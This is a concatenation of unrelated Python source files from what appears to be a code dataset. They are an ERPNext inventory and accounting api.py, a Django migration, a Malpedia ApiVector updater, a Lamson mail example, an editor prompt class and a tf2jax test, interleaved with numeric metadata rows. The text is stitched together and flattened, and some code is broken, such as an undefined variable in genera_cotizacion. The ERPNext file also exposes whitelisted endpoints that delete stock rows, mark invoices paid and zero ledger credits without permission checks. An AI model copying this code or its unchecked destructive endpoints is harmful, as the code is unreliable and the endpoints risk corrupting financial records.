para que todo Item tenga stock_maximo get_all stock_maximo < 0 (cambiarlo a int) # otra ocsion - hacer metodo desde bin y calcular reorden desde ahi (quizas es mas facil) # RG - En hooks - > events tenemos este metodo para "Bin": "on_update": "totall.api.update_actual" # RG- Lo que hace es actualizar el punto de reorden (actual-stock maximo) para que se muestre en el reporte Max del Doctype Item @frappe.whitelist() def update_actual(self,method): # m = str(self.name) + "item: " + str(self.item_code) # frappe.log_error(title="New Update Actual Qty", message=m) doc = frappe.get_doc("Item", self.item_code) if self.warehouse == 'GENERAL - SAT': doc.actual = self.actual_qty doc.reorder = float(self.actual_qty) - float(self.stock_maximo) doc.save() frappe.errprint('Items actualizado') # RG - En hooks - > events tenemos este metodo para "Item": "on_update": "totall.api.update_actual" # RG- Lo que hace es actualizar el punto de reorden (actual-stock maximo) para que se muestre en el reporte Max del Doctype Item @frappe.whitelist() def update_actual_item(self,method): # doc = frappe.get_doc("Item", self.name) frappe.errprint('asas') reorder = float(self.actual) - float(self.stock_maximo) frappe.db.sql("UPDATE tabItem set reorder=%s WHERE name = %s", (str(reorder),self.name) ) # self.save() # frappe.msgprint('El articulo ha sido actualizado.') # RG-Este es un metodo que corrimos manualmente para actualizar las cantidades de Actual y Reorder en el Item (considerando el stock maximo) #RG- ToDo - poner un metodo parecido en hooks > Events > Item > on_update para que recalcule @frappe.whitelist() def actual(): # doc = frappe.get_doc("Item", 'GUM78-ARE') # doc.save() items = frappe.get_all('Bin', filters={'warehouse': 'GENERAL - SAT'}, fields=['name', 'actual_qty','item_code']) for i in items: if 0 < i.actual_qty < 100: doc = frappe.get_doc("Item", i.item_code) doc.actual = i.actual_qty doc.reorder = float(i.actual_qty) - float(doc.stock_maximo) doc.save() frappe.errprint(i.item_code + 'actual: ' + str(i.actual_qty) + ' max: ' + str(doc.stock_maximo) ) @frappe.whitelist() def actualizar(): # para actualizar todos los items corri los queries desde la consola # items = frappe.get_all('Bin', filters={'actual_qty':'0'}, fields = ['item_code']) items = frappe.db.sql("SELECT name from tabItem WHERE actual IS NULL") for i in items: item = frappe.db.sql("SELECT actual from tabItem WHERE name = %s",i) #item = frappe.db.sql("UPDATE tabItem set actual=0 WHERE name = %s",i) frappe.errprint(item) #r = frappe.get_doc("Item", items[1]['item_code']) #frappe.errprint(items) # poner en 0 TODOS los items que tengan null - puedes frappe.db.sql ('UPDATE') # actualizar item.reorder float(i.actual) - float(doc.stock_maximo) para todos los Items.actual === 0 @frappe.whitelist() def borrar(): return frappe.db.sql("DELETE from `tabBin` where warehouse != 'GENERAL - SAT' and actual_qty = 0") @frappe.whitelist() def atrasado(): frappe.db.sql("UPDATE `tabSales Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'") frappe.db.sql("UPDATE `tabPurchase Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'") frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = DATEDIFF(CURDATE(), a.posting_date), b.factura = a.name where a.status = 'Overdue' or a.status = 'Unpaid'") frappe.db.sql("UPDATE `tabCustomer` set congelado = 1, credit_limit = 1 where atrasado >= 40 and clave like '%%CC%%'") frappe.db.sql("UPDATE `tabCustomer` set congelado = 0, credit_limit = 0 where atrasado < 40 and clave like '%%CC%%'") frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = 0 where a.customer not in (Select customer from `tabSales Invoice` where status = 'Overdue' or status = 'Unpaid')") frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'customer' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabCustomer` b on max_creation.party = b.customer_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ") frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'supplier' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabSupplier` b on max_creation.party = b.supplier_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ") @frappe.whitelist() def factura_global(): frappe.db.sql("UPDATE `tabCFDI` set grand_total = total") @frappe.whitelist() def sin_timbrar(): frappe.db.sql("UPDATE `tabSales Invoice` set sin_timbrar = DATEDIFF(CURDATE(), creation) where cfdi_status='Sin Timbrar'") @frappe.whitelist() def nuevas_facturas(): anteriores = frappe.db.sql("""SELECT name,creation,date_sub(NOW(),INTERVAL 5 HOUR),TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) FROM `tabSales Invoice` WHERE docstatus = %s AND TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) > 24""", (0), as_dict=1) for a in anteriores: frappe.db.sql("""UPDATE `tabSales Invoice` SET docstatus = 2, observaciones ='Factura cancelada por tiempo de espera excedido' WHERE name =%s""",(a.name),as_dict=1) @frappe.whitelist() def genera_cotizacion(name='PUR-SQTN-2021-00001'): si = frappe.get_doc('Supplier Quotation', name) articulosproveedor = si.items articulosventa = {} margen = si.margen #return frappe.errprint(margen) doc = frappe.new_doc('Quotation') articulosventa = doc.items for a in articulos: a.item_code a.amount = a.amount*margen a.valuation_rate = a.rate for b in articulosventa: b.item_code = a.item_code b.amount = a.amount*margen doc.save() frappe.msgprint('Cotizacion Generada') # doc.append("items", { # "item_code": si.items[0].item_code , # "qty": 1, # "precio_de_venta": si.monto / 1.16, # "monto": si.monto / 1.16, # "precio_unitario_neto": si.monto / 1.16, # "precio_neto": si.monto / 1.16, # "tax": 16, # "impuestos_totales": (si.monto / 1.16) * 0.16 # }) # # doc.append("si_sustitucion", { # "tipo_documento": "Sales Invoice" , # "sales_invoice": si.name, # "uuid": si.uuid, # "valor": si.monto # }) # # # @frappe.whitelist() def boton(name): pos = frappe.get_doc('POS Invoice', name) doc = frappe.new_doc('Sales Invoice') doc.items = pos.items doc.customer = pos.customer doc.perfil_facturacion = 'TICKET' doc.is_pos = 1 doc.update_stock = 1 doc.naming_series = 'TICKET' doc.append("payments", { "mode_of_payment": 'Efectivo', "account": '101.01 - Caja y efectivo - SAT', "amount": pos.grand_total, "type": 'Cash', "base_amount": pos.base_grand_total }) doc.save() doc.submit() frappe.errprint(doc.name) @frappe.whitelist() def update_payment_entry(name): doc = frappe.get_doc('Payment Entry',name) references = doc.references gran_total_original = 0 for r in references: si = frappe.get_doc('Sales Invoice', r.reference_name) gran_total_original += round(si.monto_pendiente, 2) frappe.db.set_value("Payment Entry Reference", r.name, 'monto_pendiente', si.monto_pendiente) #frappe.db.set_value("Payment Entry", doc.name, 'total_original', gran_total_original) frappe.errprint(gran_total_original) @frappe.whitelist() def saldos_cero(): frappe.db.sql("""update `tabGL Entry` a LEFT JOIN `tabPayment Entry` b ON a.voucher_no = b.name SET a.credit_in_account_currency = 0 , a.credit = 0 where b.unallocated_amount = a.credit_in_account_currency AND b.unallocated_amount = a.credit AND b.unallocated_amount > 0 AND b.docstatus = 1""") frappe.db.sql("""update `tabSales Invoice` SET outstanding_amount = 0 WHERE outstanding_amount < 0""") @frappe.whitelist() def crear_pago(name): doc = frappe.get_doc('CFDI Nota de Credito',name) cliente = frappe.get_doc('Customer',doc.customer) today = date.today() frappe.errprint(doc.name) frappe.errprint(doc.conversion_rate) pii = frappe.new_doc("Payment Entry") pii.mode_of_payment = 'Transferencia bancaria' # pii.payment_type = 'Pay' pii.party_type = 'Customer' pii.party = doc.customer pii.posting_date = today.strftime("%Y-%m-%d") #Daniel Acosta: Estaba mostrando un error de Fiscal Year al generar el payment entry # if doc.forma_de_pago != '01': # pii.paid_from = company.default_cash_account # else: # pii.paid_from = company.default_bank_account #pii.paid_to = company.default_receivable_account #frappe.get_value("Company",doc.company,'default_receivable_account') # pii.paid_to_account_currency = doc.currency # pii.paid_to = doc.paid_to pii.reference_no = doc.name pii.naming_series = 'NC-' # RG - Los clientes con currency != MXN solo pueden hacaer transacciones en su moneda nativa (ej. USD) # RG - Los clientes sin default_currency o con MXN pueden transaccionar en cualquier moneda # RG - Los payment entries derivados de los descuentos automaticos NO podran timbrarse. pii.paid_amount = float(doc.total) * float(doc.conversion_rate) pii.source_exchange_rate = 1 pii.target_exchange_rate = 1 pii.received_amount = float(doc.total) * float(doc.conversion_rate) company = frappe.get_doc('Company', pii.company) pii.paid_to = '102.01 - Bancos nacionales - ' + company.abbr # frappe.errprint(float(doc.total) * float(doc.conversion_rate)) for i in doc.si_sustitucion: pii.append('references', { 'reference_doctype': 'Sales Invoice', 'reference_name': i.sales_invoice, 'allocated_amount': float(i.valor) * float(doc.conversion_rate), 'pagado': float(i.valor) * float(doc.conversion_rate),#cambio hecho por Santiago }) pii.flags.ignore_permissions = True pii.flags.ignore_mandatory = True frappe.errprint(pii.party) frappe.errprint(pii.paid_to) # pii.flags.ignore_validate = True pii.submit() frappe.db.set_value("CFDI Nota de Credito", name, 'pago', pii.name) doc.pago = pii.name frappe.msgprint('Devolucion monetaria generada : ' + '<a href="#Form/Payment Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>' ) doc.reload() @frappe.whitelist() def create_stock_entry(name): doc = frappe.get_doc('CFDI Nota de Credito',name) if doc.tipo_de_factura == "Devolucion": pii = frappe.new_doc("Stock Entry") pii.stock_entry_type = "Material Receipt" pii.naming_series = "STE-" for i in doc.items: pii.append('items', { 'item_code': i.item_code, 'qty': i.qty, 'uom': i.stock_uom, 't_warehouse': i.warehouse, }) pii.flags.ignore_permissions = True pii.submit() frappe.msgprint('Devolucion de Inventario generada : ' + '<a href="#Form/Stock Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>' ) frappe.errprint('HECHO') # RG - Crear Pago @frappe.whitelist() def cancelar_pago(name): doc = frappe.get_doc('CFDI Nota de Credito', name) pii = frappe.get_doc('Payment Entry', doc.pago) pii.cancel() @frappe.whitelist() def quitar_tags_item_description(): frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""") frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""") frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""") frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""") frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p></div>',''))""") frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div><p>',''))""") frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p><p>',' '))""") frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<br>',''))""") frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""") frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p></div>',''))""") frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p><p>',' '))""") frappe.errprint('Tags Eliminados') @frappe.whitelist() def quitar_tags_item(): frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""") frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</p></div>',''))""") frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</p><p>',' '))""") frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<div><p>',' '))""") frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<br>',' '))""") frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<strong>',' '))""") frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</strong>',' '))""") frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""") frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""") frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""") @frappe.whitelist() def quitar_tags(): frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""") frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</p></div>',''))""") frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</p><p>',' '))""") frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'<strong>',' '))""") frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</strong><strong>',' '))""") @frappe.whitelist() def get_chart_data(): query = """SELECT str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `posting_date`, sum(`tabSales Invoice`.`base_grand_total`) AS `sum` FROM `tabSales Invoice` WHERE (`tabSales Invoice`.`docstatus` = 1 AND `tabSales Invoice`.`metodo_pago` = 'PPD' AND DATE(`tabSales Invoice`.`posting_date`) >= '2021-04-01') GROUP BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ORDER BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC """ data = frappe.db.sql(query, as_list=1) datasets = [] labels = [] for d in data: labels.append(d[0]) datasets.append(d[1]) query2 = """SELECT str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `creation`, sum(`tabPayment Entry`.`paid_amount`) AS `sum` FROM `tabPayment Entry` WHERE `tabPayment Entry`.`docstatus` = 1 AND `tabPayment Entry`.`payment_type` = 'Receive' GROUP BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ORDER BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC """ data2 = frappe.db.sql(query2, as_list=1) datapoints = [] labels2 = [] for d in data2: labels2.append(d[0]) datapoints.append(d[1]) return{ "labels": labels, "datasets": [{ "name": _("Ventas a Credito"), "values": datasets, "chartType": 'bar' }, { "name": _("Pagos"), "values": datapoints, "chartType": 'line' }], "type": "axis-mixed" } @frappe.whitelist() def pi_monto_pendiente(name): pi = frappe.get_doc('Purchase Invoice',name) frappe.db.set_value("Purchase Invoice",name, 'monto_pendiente', pi.grand_total) @frappe.whitelist() def pago_proveedor_usd(name): pe = frappe.get_doc('Payment Entry',name) if pe.company == 'Sillas and Chairs': per = frappe.get_list('Payment Entry Reference', filters={ 'parent': pe.name}) for r in per: frappe.db.set_value("Purchase Invoice",r, 'monto_pendiente', pe.paid_amount) @frappe.whitelist() def restore_monto_pendiente(name): doc = frappe.get_doc('Payment Entry',name) for i in doc.references: frappe.db.set_value('Sales Invoice',i.reference_name,'monto_pendiente',i.monto_pendiente) frappe.errprint(i.reference_name) frappe.errprint(i.monto_pendiente) @frappe.whitelist() def clave(name): numero = frappe.db.sql("""SELECT max(clave) + 1 as "clave" from `tabCustomer` ORDER BY creation desc """) c = frappe.get_doc('Customer', name) if c.clave is None: frappe.db.set_value("Customer", c.name, 'clave', numero) # frappe.db.sql("""UPDATE `tabCustomer` set cuenta_sat = CONCAT('110410', clave) WHERE cuenta_sat IS null """)
44.718133
510
0.681829
3,425
24,908
4.845255
0.15854
0.039048
0.037782
0.050196
0.445134
0.408677
0.353299
0.333896
0.315637
0.297077
0
0.010188
0.152762
24,908
556
511
44.798561
0.776146
0.220853
0
0.217507
0
0.068966
0.464258
0.093619
0
0
0
0.001799
0
1
0.092838
false
0
0.02122
0.007958
0.137931
0.055703
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821531d61984ff76dac0b4c73fab4063e3a37fe0
3,008
py
Python
flicks/videos/migrations/0014_auto__del_field_video_user.py
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
bf6a382913901ad193d907f022086931df0de8c4
[ "BSD-3-Clause" ]
1
2015-07-13T03:29:04.000Z
2015-07-13T03:29:04.000Z
flicks/videos/migrations/0014_auto__del_field_video_user.py
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
bf6a382913901ad193d907f022086931df0de8c4
[ "BSD-3-Clause" ]
2
2015-03-03T23:02:19.000Z
2019-03-30T04:45:51.000Z
flicks/videos/migrations/0014_auto__del_field_video_user.py
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
bf6a382913901ad193d907f022086931df0de8c4
[ "BSD-3-Clause" ]
2
2016-04-15T11:43:05.000Z
2016-04-15T11:43:15.000Z
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Deleting field 'Video.user' db.delete_column('videos_video', 'user_id') def backwards(self, orm): # User chose to not deal with backwards NULL issues for 'Video.user' raise RuntimeError("Cannot reverse this migration. 'Video.user' and its values cannot be restored.") models = { 'videos.award': { 'Meta': {'object_name': 'Award'}, 'award_type': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'category': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'preview': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}), 'region': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}), 'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['videos.Video']", 'null': 'True', 'blank': 'True'}) }, 'videos.video': { 'Meta': {'object_name': 'Video'}, 'bitly_link_db': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}), 'category': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 28, 0, 0)', 'auto_now_add': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'judge_mark': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'region': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'shortlink': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'state': ('django.db.models.fields.CharField', [], {'default': "'unsent'", 'max_length': '10'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'upload_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200'}), 'user_country': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'user_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'}), 'views': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}), 'votes': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}) } } complete_apps = ['videos']
61.387755
163
0.566489
323
3,008
5.176471
0.325077
0.110048
0.184211
0.263158
0.44677
0.428828
0.385766
0.311603
0.238636
0.117823
0
0.019494
0.198471
3,008
49
164
61.387755
0.673994
0.038564
0
0.05
0
0
0.534441
0.271028
0
0
0
0
0
1
0.05
false
0
0.1
0
0.225
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8215508f627bf3d1b4d448dabf1e8742f974b661
2,701
py
Python
update.py
cccs-rs/apiscout
27aa5cb6991a39df03695576b351a815146fd270
[ "BSD-2-Clause" ]
169
2017-04-10T14:43:54.000Z
2022-03-20T09:35:26.000Z
update.py
cccs-rs/apiscout
27aa5cb6991a39df03695576b351a815146fd270
[ "BSD-2-Clause" ]
25
2017-05-19T08:53:58.000Z
2021-07-31T14:09:37.000Z
update.py
cccs-rs/apiscout
27aa5cb6991a39df03695576b351a815146fd270
[ "BSD-2-Clause" ]
44
2017-04-10T16:22:55.000Z
2021-11-09T13:45:08.000Z
import re import os import sys import requests try: import config except: print("create a config.py based on template.config.py and set your Malpedia API token!") sys.exit() def delete_existing_dbs(): """ delete potentially existing old apivector db files """ for filename in os.listdir("dbs"): if re.search(r"\d{4}-\d\d-\d\d-apivectors-v\d+\.csv", filename): os.remove("dbs" + os.sep + filename) def get_newest_db_version(): """ find ApiVector DB files and return newest version number found """ max_version = 0 for filename in os.listdir("dbs"): version = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", filename) if version: max_version = max(max_version, int(version.group("version_number"))) return max_version def download_apivector_db(): result = { "filename": "", "content": "", "version": 0 } response = requests.get( 'https://malpedia.caad.fkie.fraunhofer.de/api/list/apiscout/csv', headers={'Authorization': 'apitoken ' + config.APITOKEN}, ) if response.status_code == 200: result["filename"] = response.headers['Content-Disposition'].split("=")[1].strip() result["content"] = response.text version = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", result["filename"]) result["version"] = version else: print("Failed to download ApiVector DB, response code: ", response.status_code) return result def check_malpedia_version(): remote_version = 0 response = requests.get( 'https://malpedia.caad.fkie.fraunhofer.de/api/get/version' ) if response.status_code == 200: response_json = response.json() remote_version =response_json["version"] else: print("Failed to check Malpedia version, response code: ", response.status_code) return remote_version def main(): db_version = get_newest_db_version() malpedia_version = check_malpedia_version() if db_version < malpedia_version: apivector_update = download_apivector_db() if apivector_update["version"]: delete_existing_dbs() update_db_path = "dbs" + os.sep + apivector_update["filename"] with open(update_db_path, "w") as fout: fout.write(apivector_update["content"]) print("Downloaded and stored ApiVector DB file: ", update_db_path) else: print("ApiVector update download failed.") else: print("Your ApiVector DB is the most recent ({})".format(malpedia_version)) if __name__ == "__main__": sys.exit(main())
32.939024
108
0.640874
340
2,701
4.923529
0.302941
0.010753
0.010753
0.017921
0.280765
0.224612
0.151732
0.151732
0.151732
0.151732
0
0.006217
0.225842
2,701
81
109
33.345679
0.794357
0.042207
0
0.151515
0
0.030303
0.277886
0.05752
0
0
0
0
0
1
0.075758
false
0
0.075758
0
0.19697
0.090909
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8215786d8a3f20e9ccb720b4af31a0f44f648d88
752
py
Python
Support/Fuego/Pythia/pythia-0.4/packages/fuego/fuego/serialization/chemkin/unpickle/mechanisms/Declaration.py
marient/PelePhysics
e6ad1839d77b194e09ab44ff850c9489652e5d81
[ "BSD-3-Clause-LBNL" ]
1
2019-04-24T13:32:23.000Z
2019-04-24T13:32:23.000Z
Support/Fuego/Pythia/pythia-0.4/packages/fuego/fuego/serialization/chemkin/unpickle/mechanisms/Declaration.py
marient/PelePhysics
e6ad1839d77b194e09ab44ff850c9489652e5d81
[ "BSD-3-Clause-LBNL" ]
null
null
null
Support/Fuego/Pythia/pythia-0.4/packages/fuego/fuego/serialization/chemkin/unpickle/mechanisms/Declaration.py
marient/PelePhysics
e6ad1839d77b194e09ab44ff850c9489652e5d81
[ "BSD-3-Clause-LBNL" ]
null
null
null
#!/usr/bin/env python # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # Michael A.G. Aivazis # California Institute of Technology # (C) 1998-2003 All Rights Reserved # # <LicenseText> # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # class Declaration: def __init__(self, locator): self.locator = locator return def __str__(self): if self.locator: return "source='%s', line=%d, column=%d" % ( self.locator.filename, self.locator.line, self.locator.column) return "source=<unknown>" # version __id__ = "$Id$" # End of file
22.117647
82
0.408245
60
752
4.916667
0.65
0.223729
0
0
0
0
0
0
0
0
0
0.014898
0.285904
752
33
83
22.787879
0.534451
0.509309
0
0
0
0
0.143662
0
0
0
0
0
0
1
0.2
false
0
0
0
0.6
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
82175e8b7a22ac93f4e8ed01903f37b29cf95227
1,242
py
Python
fate/prompt.py
Mattias1/fate
10266406336bc4c683ff5b23af32ac3447f7f054
[ "MIT" ]
null
null
null
fate/prompt.py
Mattias1/fate
10266406336bc4c683ff5b23af32ac3447f7f054
[ "MIT" ]
null
null
null
fate/prompt.py
Mattias1/fate
10266406336bc4c683ff5b23af32ac3447f7f054
[ "MIT" ]
null
null
null
from .mode import Mode from .document import Document Document.promptinput = '' class Prompt(Mode): def __init__(self, document, callback=None): Mode.__init__(self, document, callback) self.inputstring = '' self.start(document) def processinput(self, document, userinput): if isinstance(userinput, str): key = userinput if key == 'Cancel': self.stop(document) elif key == '\n': document.promptinput = self.inputstring self.stop(document) elif len(key) > 1: # key not supported pass else: self.inputstring += key else: raise NotImplementedError('To be done.') def start(self, doc): Mode.start(self, doc) doc.OnPrompt.fire(doc) def stop(self, doc): Mode.stop(self, doc) doc.OnPrompt.fire(doc) def prompt(promptstring='>'): """Constructor for the prompt mode.""" class PromptWithString(Prompt): def __init__(self, document, callback=None): Prompt.__init__(self, document, callback) self.promptstring = promptstring return PromptWithString
28.883721
55
0.573269
125
1,242
5.568
0.352
0.086207
0.091954
0.137931
0.25
0.16954
0.08046
0
0
0
0
0.001193
0.325282
1,242
42
56
29.571429
0.829356
0.041063
0
0.235294
0
0
0.016878
0
0
0
0
0
0
1
0.176471
false
0.029412
0.058824
0
0.323529
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8218206b49510d2a8ddd9239bbd0591e170620c6
482
py
Python
examples/osb/app/model/comment.py
medecau/lamson
e78520b857384462b9eecdedfc0f8c2e57cdd00a
[ "BSD-3-Clause" ]
null
null
null
examples/osb/app/model/comment.py
medecau/lamson
e78520b857384462b9eecdedfc0f8c2e57cdd00a
[ "BSD-3-Clause" ]
null
null
null
examples/osb/app/model/comment.py
medecau/lamson
e78520b857384462b9eecdedfc0f8c2e57cdd00a
[ "BSD-3-Clause" ]
null
null
null
from lamson import queue def attach_headers(message, user_id, post_name, domain): """Headers are used later by the index.py handler to figure out where the message finally goes.""" message['X-Post-Name'] = post_name message['X-Post-User-ID'] = user_id message['X-Post-Domain'] = domain def defer_to_queue(message): index_q = queue.Queue("run/posts") # use a diff queue? index_q.push(message) print "run/posts count after dever", index_q.count()
30.125
73
0.697095
76
482
4.289474
0.526316
0.055215
0.110429
0
0
0
0
0
0
0
0
0
0.182573
482
15
74
32.133333
0.827411
0.03527
0
0
0
0
0.204986
0
0
0
0
0
0
0
null
null
0
0.111111
null
null
0.111111
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
82186e13305a89984ea44c868e824fbefce44ba3
1,677
py
Python
tf2jax/_src/numpy_compat_test.py
deepmind/tf2jax
fb5388656344a7e5bb8e5635e82a3d93c7bc9d8c
[ "Apache-2.0" ]
6
2022-03-18T12:09:11.000Z
2022-03-26T14:16:35.000Z
tf2jax/_src/numpy_compat_test.py
deepmind/tf2jax
fb5388656344a7e5bb8e5635e82a3d93c7bc9d8c
[ "Apache-2.0" ]
null
null
null
tf2jax/_src/numpy_compat_test.py
deepmind/tf2jax
fb5388656344a7e5bb8e5635e82a3d93c7bc9d8c
[ "Apache-2.0" ]
1
2022-03-18T12:09:23.000Z
2022-03-18T12:09:23.000Z
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for tf2jax.""" from absl.testing import absltest from absl.testing import parameterized import jax.numpy as jnp import numpy as np import tensorflow as tf from tf2jax._src import numpy_compat _dtypes = [ tf.bool, tf.uint8, tf.uint16, tf.uint32, tf.uint64, tf.int8, tf.int16, tf.int32, tf.int64, tf.bfloat16, tf.float16, tf.float32, tf.float64, tf.complex64, tf.complex128 ] class NumpyCompatTest(parameterized.TestCase): @parameterized.named_parameters( ("np", np, numpy_compat.tf_to_np_dtypes), ("jnp", jnp, numpy_compat.tf_to_jnp_dtypes), ) def test_dtype_conversion(self, np_module, dtype_map): self.assertEqual(len(_dtypes), len(dtype_map)) for src in _dtypes: dst = "bool_" if src.name == "bool" else src.name if src.name == "bfloat16": self.assertIs(dtype_map[src], jnp.bfloat16) else: self.assertIs(dtype_map[src], getattr(np_module, dst)) if __name__ == "__main__": absltest.main()
33.54
80
0.692308
235
1,677
4.808511
0.510638
0.053097
0.023009
0.028319
0.040708
0
0
0
0
0
0
0.029286
0.165176
1,677
49
81
34.22449
0.777857
0.409064
0
0
0
0
